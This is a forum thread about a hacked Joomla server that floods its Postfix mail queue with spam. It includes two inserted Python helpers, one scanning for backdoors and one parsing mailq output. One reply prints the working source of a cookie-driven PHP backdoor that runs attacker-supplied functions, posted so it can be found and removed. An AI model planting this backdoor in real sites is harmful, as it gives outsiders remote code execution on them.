SOLVED - please help, server hacked (postfix, mailq is filling up FAST)

If OSSEC operates anything like LFD, it writes a logfile of its own where it records its actions. IP blocks are performed via iptables, and it also has a block management of its own. (Then again, CSF/LFD has a GUI that can be integrated in Webmin, don’t know if OSSEC has the same.)

Hi
My English is not good enough, but I will try to help:
I see in your log this PHP file/script:
sys09725848.php <<<< this is the reason, DELETE this file
/components/com_mailto/sys09725848.php I think this is the path to this file

Use Akeeba Admin Tools to fix folder and file permissions.
Upgrade Joomla and check your .htaccess file.

THANK YOU! I found that file, but it was in /components/com_media/. Either way, that sure looks like it!

I am having a hard time with OSSEC, I’d like to look into CSF/LFD. Can you point me in the right direction as to how to integrate it with Webmin?

The CSF archive contains a Webmin module which you can import into Webmin. The Readme file should contain instructions on how to do that.

found it, thanks. Now I just have to get it all configured. . .

I just wanted to update; all is running smoothly now. I swapped OSSEC for CSF/LFD. I think OSSEC was probably working fine, but I couldn’t see what it was actively doing, so I didn’t trust it. CSF NEEDED a lot of setup before it was useful (as in, not alerting me for everything). I almost pulled the plug on it, but am happy with it now, and I can see what it is doing. (By see, I don’t mean it has fancy graphs and charts, I mean I can tell what it is doing. A simple text list spit out on the command line is good enough, but I couldn’t get OSSEC to do that for me.)

I think I also may have found where the malicious file may have got in: through a social login plugin by Login Radius. I have disabled the module and all “suspicious process” reports from ourshore.ca have stopped.

Thanks for all your help. . . on to the next thing.

Please open the plugin folder, do you see .joomla.system.php?
This file is a backdoor:

    <?php
    /**
     * @package Joomla.Plugin
     * @since 1.5
     */
    class PlgSystemJoomla {
        public function __construct() {
            // the name of the function to call arrives in a cookie
            $file = @$_COOKIE['Jlm3'];
            if ($file) {
                // two more cookies are passed through that function to
                // build the callable and its argument; nothing is hard-coded
                $opt = $file(@$_COOKIE['Jlm2']);
                $au  = $file(@$_COOKIE['Jlm1']);
                $opt("/585/e", $au, 585);
                die();
            }
        }
    }
    $index = new PlgSystemJoomla;

Remove this file, then also remove com_eXtplorer: http://forum.joomla.org/viewtopic.php?f=714&t=829974
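One way to hunt for this kind of backdoor across a whole Joomla tree, as an added example that is not code from this thread, from Joomla or from any tool named here: a small Python scanner that flags PHP files in which a variable filled from $_COOKIE (or $_GET, $_POST, $_REQUEST) is later used as a function name, which is exactly what the snippet above does with the Jlm3, Jlm2 and Jlm1 cookies, and that also flags hidden .php files such as .joomla.system.php. The two sample sources, the plugins/system paths and the hidden-file heuristic are constructed for the example; the scanner is a heuristic, not a full PHP parser.

```python
import os
import re
from pathlib import PurePosixPath

# Constructed sample inputs. BACKDOOR_SRC is the code posted in this thread,
# reflowed onto separate lines; BENIGN_SRC is a harmless plugin stub written
# for contrast (not real Joomla code).
BACKDOOR_SRC = r'''<?php
class PlgSystemJoomla {
    public function __construct() {
        $file = @$_COOKIE['Jlm3'];
        if ($file) {
            $opt = $file(@$_COOKIE['Jlm2']);
            $au  = $file(@$_COOKIE['Jlm1']);
            $opt("/585/e", $au, 585);
            die();
        }
    }
}
$index = new PlgSystemJoomla;
'''

BENIGN_SRC = r'''<?php
defined('_JEXEC') or die;
class PlgSystemExample extends JPlugin {
    public function onAfterInitialise() {
        $lang = JFactory::getLanguage();
        $lang->load('plg_system_example');
    }
}
'''

# $name = @$_COOKIE['x']  (also GET/POST/REQUEST): variable filled from the request
TAINT_ASSIGN = re.compile(r"\$(\w+)\s*=\s*@?\$_(COOKIE|GET|POST|REQUEST)\s*\[")
# $name = $other(...): the result of calling a tainted variable is tainted too
CALL_ASSIGN = re.compile(r"\$(\w+)\s*=\s*\$(\w+)\s*\(")
# $name(: a variable used as the function name (PHP variable function)
VAR_CALL = re.compile(r"\$(\w+)\s*\(")


def tainted_variables(source):
    """Names assigned from a request superglobal, plus names derived by calling one."""
    tainted = {m.group(1) for m in TAINT_ASSIGN.finditer(source)}
    changed = True
    while changed:  # propagate: $opt = $file(...) with $file tainted => $opt tainted
        changed = False
        for m in CALL_ASSIGN.finditer(source):
            target, callee = m.groups()
            if callee in tainted and target not in tainted:
                tainted.add(target)
                changed = True
    return tainted


def scan_php_source(path, source):
    """Return a list of human-readable findings for one PHP file."""
    findings = []
    name = PurePosixPath(path).name
    if name.startswith(".") and name.endswith(".php"):
        # heuristic (assumption): hidden PHP files are not expected in a Joomla tree
        findings.append(f"{path}: hidden .php file")
    tainted = tainted_variables(source)
    for m in VAR_CALL.finditer(source):
        if m.group(1) in tainted:
            line = source.count("\n", 0, m.start()) + 1
            findings.append(
                f"{path}:{line}: ${m.group(1)}() called with a name taken from the request")
    return findings


def scan_tree(root):
    """Scan every .php file below root (hidden files included) and collect findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.endswith(".php"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_php_source(path, fh.read()))
    return findings


if __name__ == "__main__":
    # constructed paths, shown only to exercise the scanner without a real site
    for f in scan_php_source("plugins/system/.joomla.system.php", BACKDOOR_SRC):
        print(f)
    print(scan_php_source("plugins/system/example/example.php", BENIGN_SRC))
```

Run scan_tree() against the web root of each site; a clean Joomla install should produce no findings, so anything it reports is worth reading by hand.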

Thank you again! I just went through 7 different Joomla sites and removed eXtplorer. I never used it much anyway. Came in handy for client with their own hosting (GoDaddy, ugh) but I don’t need it.

Only the one site had any of the malicious files on it.

OK, second update - I was wrong about where I thought the security hole was.

astecko had it right in his reply above (about 6 down from the top).

I turned my emails on on my phone tonight and 600 “undelivered mail returned” messages came through.

Logged into Virtualmin tonight and it's still going (9,500 in under 1 hour). I have tried disabling the server and changing the email password. The account in question is info@espressowebdesign.co.uk

email headers as follows:

Return-Path: <>
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
ewd01.espressowebdesign.net
X-Spam-Level: *
X-Spam-Status: No, score=1.7 required=5.0 tests=NO_RELAYS,URIBL_BLACK
autolearn=no version=3.3.1
X-Original-To: info@espressowebdesign.co.uk
Delivered-To: info-espressowebdesign.co.uk@espressowebdesign.net
Received: by ewd01.espressowebdesign.net (Postfix) id 46BCACC80A; Fri,
20 Jun 2014 19:28:49 +0100 (BST)
Date: Fri, 20 Jun 2014 19:28:49 +0100 (BST)
From: MAILER-DAEMON@espressowebdesign.net (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: info@espressowebdesign.co.uk
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="7B025CC7F5.1403288929/ewd01.espressowebdesign.net"
Message-Id: 20140620182849.46BCACC80A@ewd01.espressowebdesign.net

Message contents:

This is the mail system at host ewd01.espressowebdesign.net.

I’m sorry to have to inform you that your message could not
be delivered to one or more recipients. It’s attached below.

For further assistance, please send mail to postmaster.

If you do so, please include this problem report. You can
delete your own text from the attached returned message.

               The mail system

hubert.pattermann@tele2.at: host mailgw.swip.net[212.247.156.1] said: 550
hubert.pattermann@tele2.at unknown user account (in reply to RCPT TO
command)

Failed delivery status
Final recipient: hubert.pattermann@tele2.at
Reason for failure: 550 hubert.pattermann@tele2.at unknown user account
Remote mail server: mailgw.swip.net
Reporting mail server: ewd01.espressowebdesign.net

Problem is, guys, the person who controls, runs support and helps me with this is away on holiday; I don't have a clue how this works. Can anyone help?

desperate
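To see which account is feeding a queue like the one described above, as an added example (not from this thread, Virtualmin or Postfix): a Python parser for `postqueue -p` / `mailq` output that groups queued messages by envelope sender and lists the queue IDs belonging to one sender. The queue listing below is constructed for the example; the queue IDs 46BCACC80A and 7B025CC7F5, the addresses info@espressowebdesign.co.uk and hubert.pattermann@tele2.at and the host mailgw.swip.net[212.247.156.1] are taken from the headers posted above, while the third ID, the other recipients and the timeout reason are made up.

```python
import re
from collections import Counter

# Constructed sample of `postqueue -p` output (see lead-in for which values
# come from the thread). Bounces appear with MAILER-DAEMON as the sender.
SAMPLE_MAILQ = """\
-Queue ID-  --Size-- ----Arrival Time---- -Sender/Recipient-------
46BCACC80A*     2034 Fri Jun 20 19:28:49  MAILER-DAEMON
(connect to mailgw.swip.net[212.247.156.1]:25: Connection timed out)
                                         hubert.pattermann@tele2.at

7B025CC7F5      1820 Fri Jun 20 19:25:10  info@espressowebdesign.co.uk
                                         recipient-one@example.org
                                         recipient-two@example.net

5A1D2E3F40!     1500 Fri Jun 20 19:20:03  info@espressowebdesign.co.uk
                                         recipient-three@example.com

-- 6 Kbytes in 3 Requests.
"""

# First line of a queue entry: id, optional status flag, size, arrival time, sender.
# '*' marks an active message and '!' a message on hold; no flag means deferred.
ENTRY_RE = re.compile(
    r"^([0-9A-Za-z]+)([*!]?)\s+(\d+)\s+"
    r"(\w{3} \w{3} +\d+ \d\d:\d\d:\d\d)\s+(\S+)$")
STATUS = {"*": "active", "!": "hold", "": "deferred"}


def parse_mailq(text):
    """Parse mailq / postqueue -p output into a list of queue-entry dicts."""
    entries, current = [], None
    for line in text.splitlines():
        if not line.strip() or line.startswith("-"):
            continue  # blank line, column header or the '-- N Kbytes' trailer
        m = ENTRY_RE.match(line)
        if m:
            qid, flag, size, arrival, sender = m.groups()
            current = {"queue_id": qid, "status": STATUS[flag], "size": int(size),
                       "arrival": arrival, "sender": sender,
                       "recipients": [], "reason": None}
            entries.append(current)
        elif current is None:
            continue  # e.g. "Mail queue is empty"
        elif line.startswith("("):
            current["reason"] = line.strip()[1:-1]  # deferral reason in parentheses
        else:
            current["recipients"].append(line.strip())  # indented recipient line
    return entries


def messages_per_sender(entries):
    """Count queued messages per envelope sender, most prolific first."""
    return Counter(e["sender"] for e in entries)


def queue_ids_for_sender(entries, sender):
    """Queue IDs of every message from one sender, e.g. the compromised account."""
    return [e["queue_id"] for e in entries if e["sender"] == sender]


if __name__ == "__main__":
    queue = parse_mailq(SAMPLE_MAILQ)
    for sender, count in messages_per_sender(queue).most_common():
        print(f"{count:6d}  {sender}")
    print(queue_ids_for_sender(queue, "info@espressowebdesign.co.uk"))
```

On a live server, pipe the output of `postqueue -p` into parse_mailq(); the sender counts show at a glance whether one account is responsible, and the queue IDs for that sender are what you would pass to postsuper to hold or remove them once the password has been changed and the sending script found.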

Hi there,

Could you start a new Forum thread for the email issue you’re seeing?

That would make it a bit easier to help, since this current thread is a bit on the older side.

Then we’ll be able to get a fresh start and figure out what’s going on :slight_smile:

Thanks!

-Eric